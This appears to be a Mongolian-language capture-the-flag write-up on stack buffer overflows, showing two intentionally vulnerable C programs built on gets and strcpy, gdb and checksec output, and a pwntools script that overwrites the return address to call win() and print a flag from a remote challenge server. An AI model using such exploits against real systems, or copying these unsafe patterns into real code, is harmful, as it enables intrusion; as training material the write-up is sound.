⚔️Buffer Overflow
Buffer Overflow-той холбоотой жишээнүүдийг энэхүү хэсэгт оруулна
#1 Simple BoF
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>
#define FLAGSIZE_MAX 64
char flag[FLAGSIZE_MAX];
void sigsegv_handler(int sig) {
printf("%s\n", flag);
fflush(stdout);
exit(1);
}
void vuln(char *input){
char buf2[16];
strcpy(buf2, input);
}
int main(int argc, char **argv){
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(flag,FLAGSIZE_MAX,f);
signal(SIGSEGV, sigsegv_handler); // Set up signal handler
gid_t gid = getegid();
setresgid(gid, gid, gid);
printf("Input: ");
fflush(stdout);
char buf1[100];
gets(buf1);
vuln(buf1);
printf("The program will exit now\n");
return 0;
}┌─[root@kali]─[]
└──╼ $ nc saturn.net 55986
Input: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA#2
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "asm.h"
#define BUFSIZE 32
#define FLAGSIZE 64
void win() {
char buf[FLAGSIZE];
FILE *f = fopen("flag.txt","r");
if (f == NULL) {
printf("%s %s", "Please create 'flag.txt' in this directory with your",
"own debugging flag.\n");
exit(0);
}
fgets(buf,FLAGSIZE,f);
printf(buf);
}
void vuln(){
char buf[BUFSIZE];
gets(buf);
printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address());
}
int main(int argc, char **argv){
setvbuf(stdout, NULL, _IONBF, 0);
gid_t gid = getegid();
setresgid(gid, gid, gid);
puts("Please enter your string: ");
vuln();
return 0;
}┌─[root@kali]─[bof_1]
└──╼ $ checksec vuln
[*] '/bof_1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segmentsgef➤ p win
$1 = {<text variable, no debug info>} 0x80491f6 <win>gef➤ r
Starting program: /bof_1/vuln
Please enter your string:
AAAAAAAA
...
gef➤ search-pattern AAAAAAAA
[+] Searching 'AAAAAAAA' in memory
[+] In '[heap]'(0x804d000-0x806f000), permission=rwx
0x804d1a0 - 0x804d1aa → "AAAAAAAA\n"
[+] In '[stack]'(0xfffdd000-0xffffe000), permission=rwx
0xffffd050 - 0xffffd058 → "AAAAAAAA"
gef➤ i f
Stack level 0, frame at 0xffffd080:
eip = 0x80492a3 in vuln; saved eip = 0x804932f
called by frame at 0xffffd0b0
Arglist at 0xffffd03c, args:
Locals at 0xffffd03c, Previous frame's sp is 0xffffd080
Saved registers:
ebx at 0xffffd074, ebp at 0xffffd078, eip at 0xffffd07cfrom pwn import *
elf = ELF('./vuln')
libc = elf.libc
if args.REMOTE:
p = remote('saturn.net',61406)
else:
p = process(elf.path)
# payload buffer
payload = b'A'*44
payload += p32(0x80491f6)
print(p.recvuntil(':'))
p.send(payload)
p.interactive()┌─[root@kali]─[/bof_1]
└──╼ $ python3 bof1.py REMOTE
[*] '/bof_1'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE (0x8048000)
RWX: Has RWX segments
[*] '/usr/lib32/libc-2.31.so'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[+] Opening connection to saturn.picoctf.net on port 61406: Done
b'Please enter your string:'
[*] Switching to interactive mode
$
Okay, time to return... Fingers Crossed... Jumping to 0x80491f6
CTF{addr3ss3s_ar3_3asy_60fac6aa}
[*] Got EOF while reading in interactiveLast updated